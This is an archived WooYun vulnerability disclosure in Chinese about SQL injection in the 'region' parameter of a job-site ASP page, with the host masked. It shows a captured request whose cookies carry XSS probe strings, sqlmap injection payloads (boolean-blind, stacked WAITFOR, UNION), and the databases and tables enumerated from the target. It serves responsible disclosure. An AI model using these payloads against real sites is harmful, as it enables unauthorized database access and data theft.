乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-13: 细节已通知厂商并且等待厂商处理中 2015-10-16: 厂商已经确认,细节仅向厂商公开 2015-10-26: 细节向核心白帽子及相关领域专家公开 2015-11-05: 细节向普通白帽子公开 2015-11-15: 细节向实习白帽子公开 2015-11-30: 细节向公众公开
RT
GET /bys/freeposlistmore_dxs.asp?pagesize=3®ion=*&reqtxt=&tp=2 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://**.**.**.**/Cookie: cacheid=E%3A%5Cwebroot%5Cjxrcw2008%5Ccachefile%5C20151012969%2Edbx; ASPSESSIONIDSADQRSDD=MNDGBIEBCDAIJOMFAOOOJNEO; once%5Fsea0=2015%2F10%2F12+11%3A38%3A34%5Bs%5Dduring%3D30%26; c%5Fcounts=0; once%5Fsea1=2015%2F10%2F12+11%3A38%3A39%5Bs%5Dduring%3D30%26ktp%3Ddw%26keyword%3De%26; dwid=; rcid=vid=b2b7ab2daf45bbf17f00b39b68c3dbf9&id=13480735; once%5Fsea2=2015%2F10%2F12+9%3A13%3A18%5Bs%5Dduring%3D30%26hr1%3D%2C362500%2C100000%26; ASP.NET_SessionId=ct5xohmgzk2aba555ozabg45; once%5Fsea3=2015%2F10%2F12+9%3A14%3A17%5Bs%5Dduring%3D1%26ktp%3Dcom%26keyword%3D1%26; once%5Fsea4=2015%2F10%2F12+9%3A07%3A41%5Bs%5Dduring%3D30%26; once%5Fsea5=2015%2F10%2F12+9%3A14%3A54%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%D6%B0%CE%BB%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%26; once%5Fsea6=2015%2F10%2F12+9%3A07%3A53%5Bs%5Dduring%3D30%26ktp%3Dcom%26keyword%3D1%26; once%5Fsea7=2015%2F10%2F12+9%3A07%3A59%5Bs%5Dduring%3D30%26; PHPSESSID=0f07c3754e2326b636e6bdd57f0f1cb3; once%5Fsea8=2015%2F10%2F12+11%3A38%3A31%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%E5%8E%A8%E5%B8%88%26; once%5Fsea9=2015%2F10%2F12+11%3A38%3A32%5Bs%5Dduring%3D30%26ktp%3Ddw%26keyword%3De%26; Hm_lvt_59597c781e785574f9f3b0ff29411bb0=1444620927,1444620934,1444620940,1444621125; Hm_lpvt_59597c781e785574f9f3b0ff29411bb0=1444621125; HMVT=59597c781e785574f9f3b0ff29411bb0|1444617322|; HMACCOUNT=A045F03F2DBCE2A0; bdshare_firstime=1444617386998; BAIDUID=530654A42E45A89ADE4A3F0A3C813510:FG=1; ASPSESSIONIDQADRSRCD=IAMPMGHBLPEGAJIAGDLGHDBC; a6859_pages=1; a6859_times=1; Hm_lvt_471ed30175c7aad703184515a9ddad0f=1444617449; Hm_lpvt_471ed30175c7aad703184515a9ddad0f=1444617449; Hm_lvt_4ac9bac48b6e5cf16bf967ce611cc056=1444618265; Hm_lpvt_4ac9bac48b6e5cf16bf967ce611cc056=1444618265; ASPSESSIONIDQACTTSDC=BPCHFNCBKGPNGEAEOHAJFKCN; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; kf51_userid=1444618182085_8968; kf51_referrer=http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29; cck_lasttime=1444618182090; cck_count=0; jxrc_dw_autowidth=1; cnzz_a31557=0; sin31557=http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29; rtime=0; ltime=1444620194724; cnzz_eid=17005507-1304580828-http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%28; CNZZDATA31664=cnzz_eid%3D1282555937-1444615235-http%253A%252F%252F**.**.**.**%252F%26ntime%3D1444615235Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
region参数存在注入
sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3®ion=%' AND 8995=8995 AND '%'='&reqtxt=&tp=2 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3®ion=%';WAITFOR DELAY '0:0:5'--&reqtxt=&tp=2 Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3®ion=-9379%' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(97)+CHAR(69)+CHAR(109)+CHAR(119)+CHAR(66)+CHAR(117)+CHAR(118)+CHAR(113)+CHAR(81)+CHAR(120)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL-- &reqtxt=&tp=2---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008available databases [8]:[*] master[*] model[*] msdb[*] newjxrc[*] News[*] ReportServer[*] ReportServerTempDB[*] tempdb
Database: newjxrc[10 tables]+--------------+| CD_INDU || PosViewTimes || RC_INFO || RESULT4DW || RESULT4RC || cd_educ || groupPos || indutj || postptj || wkregtj |+--------------+
Database: master[359 tables]+---------------------------------------------------+| INFORMATION_SCHEMA.CHECK_CONSTRAINTS || INFORMATION_SCHEMA.COLUMNS || INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || INFORMATION_SCHEMA.COLUMN_PRIVILEGES || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || INFORMATION_SCHEMA.DOMAINS || INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || INFORMATION_SCHEMA.KEY_COLUMN_USAGE || INFORMATION_SCHEMA.PARAMETERS || INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || INFORMATION_SCHEMA.ROUTINES || INFORMATION_SCHEMA.ROUTINE_COLUMNS || INFORMATION_SCHEMA.SCHEMATA || INFORMATION_SCHEMA.TABLES || INFORMATION_SCHEMA.TABLE_CONSTRAINTS || INFORMATION_SCHEMA.TABLE_PRIVILEGES || INFORMATION_SCHEMA.VIEWS || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || INFORMATION_SCHEMA.VIEW_TABLE_USAGE || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_values || sys.all_columns || sys.all_objects || sys.all_parameters || sys.all_sql_modules || sys.all_views || sys.allocation_units || sys.assemblies || sys.assembly_files || sys.assembly_modules || sys.assembly_references || sys.assembly_types || sys.asymmetric_keys || sys.backup_devices || sys.certificates || sys.change_tracking_databases || sys.change_tracking_tables || sys.check_constraints || sys.column_type_usages || sys.column_xml_schema_collection_usages || sys.columns || **.**.**.**puted_columns || sys.configurations || sys.conversation_endpoints || sys.conversation_groups || sys.conversation_priorities || sys.credentials || sys.crypt_properties || sys.cryptographic_providers || sys.data_spaces || sys.database_audit_specification_details || sys.database_audit_specifications || sys.database_files || sys.database_mirroring_endpoints || sys.database_mirroring_endpoints || sys.database_mirroring_witnesses || sys.database_permissions || sys.database_principal_aliases || sys.database_principals || sys.database_recovery_status || sys.database_role_members || sys.databases || sys.default_constraints || sys.destination_data_spaces || sys.dm_audit_actions || sys.dm_audit_class_type_map || sys.dm_broker_activated_tasks || sys.dm_broker_connections || sys.dm_broker_forwarded_messages || sys.dm_broker_queue_monitors || sys.dm_cdc_errors || sys.dm_cdc_log_scan_sessions || sys.dm_clr_appdomains || sys.dm_clr_loaded_assemblies || sys.dm_clr_properties || sys.dm_clr_tasks || sys.dm_cryptographic_provider_properties |
基本上读取数据无障碍,至此。
危害等级:高
漏洞Rank:10
确认时间:2015-10-16 14:34
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无